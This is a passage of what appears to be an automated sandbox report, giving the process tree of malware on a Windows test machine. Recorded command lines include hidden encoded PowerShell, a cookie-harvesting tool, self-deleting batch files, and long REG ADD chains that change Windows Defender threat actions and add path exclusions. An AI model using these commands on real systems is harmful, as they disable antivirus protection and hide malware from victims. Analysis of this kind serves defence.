        "C:\ProgramData\8208940.exe"
        5⤵
        
        PID:7456
    - - C:\ProgramData\4040619.exe
        
        "C:\ProgramData\4040619.exe"
        5⤵
        
        PID:8068
    - - C:\ProgramData\6365558.exe
        
        "C:\ProgramData\6365558.exe"
        5⤵
        
        PID:7416
    - - C:\ProgramData\8435573.exe
        
        "C:\ProgramData\8435573.exe"
        5⤵
        
        PID:3156
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
      4⤵
      PID:7840
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:388
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:4268

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4164

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2064

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4388

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5996
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F860EA611EF09878476B1381C89C894A C
  2⤵
  PID:5156
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6760B1FC13AC25733F45DA53E40397F5
  2⤵
  PID:5816
- C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
  2⤵
  PID:2516
- - C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
    3⤵
    PID:7528
  - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
      4⤵
      PID:5940
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e8,0x1ec,0x1f0,0x1c4,0x1f4,0x7ffd075e9ec0,0x7ffd075e9ed0,0x7ffd075e9ee0
        5⤵
        
        PID:8728
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1672 /prefetch:2
        5⤵
        
        PID:3796
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --mojo-platform-channel-handle=1724 /prefetch:8
        5⤵
        
        PID:8976
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --mojo-platform-channel-handle=2132 /prefetch:8
        5⤵
        
        PID:4828
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2648 /prefetch:1
        5⤵
        
        PID:3228
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --mojo-platform-channel-handle=3124 /prefetch:8
        5⤵
        
        PID:10084
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1664,18019972766906032790,15254444044451024635,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5940_183498724" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2204 /prefetch:2
        5⤵
        
        PID:10156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEF22.bat" "
    3⤵
    PID:4820
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
      4⤵
      Views/modifies file attributes
      PID:5656
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:7716
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEF22.bat"
      4⤵
      Views/modifies file attributes
      PID:9392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEF22.bat" "
      4⤵
      PID:9976
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" cls"
      4⤵
      PID:9996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE1230.bat" "
    3⤵
    PID:8816
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
      4⤵
      Views/modifies file attributes
      PID:4340
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:7784
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:9496
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE1230.bat"
      4⤵
      Views/modifies file attributes
      PID:8284
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE1230.bat" "
      4⤵
      PID:1120
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" cls"
      4⤵
      PID:6292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6704

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5868

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\21658f08599e4d6c9e0d5ff0630cca4c /t 496 /p 4388
1⤵
PID:4000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6976

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7516

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:6616
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7fe56602-c39a-154a-8fc6-722b387f6b7f}\oemvista.inf" "9" "4d14a44ff" "0000000000000124" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:5920
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000124"
  2⤵
  PID:8012

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7684

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:4828

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:3500

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\900b70cf0c4044b8afb03aa862345146 /t 7692 /p 7516
1⤵
PID:8020

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\c4c37b1019d1481fad4b3763d3f12755 /t 7712 /p 7684
1⤵
PID:6220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffcf1c56e00,0x7ffcf1c56e10,0x7ffcf1c56e20
1⤵
PID:8136

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:7296
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:7796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1208

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7772

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7524

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\661be89f1f8249c5904abd7f0b0ff5be /t 800 /p 7772
1⤵
PID:4828

C:\Users\Admin\AppData\Local\Temp\55D4.tmp.exe
C:\Users\Admin\AppData\Local\Temp\55D4.tmp.exe
1⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\AqSWrSA.exe
C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\AqSWrSA.exe 9n /site_id 754 /S
1⤵
PID:6412
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:6856
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4972
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9260
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:9568
- - C:\Windows\SysWOW64\cmd.exe
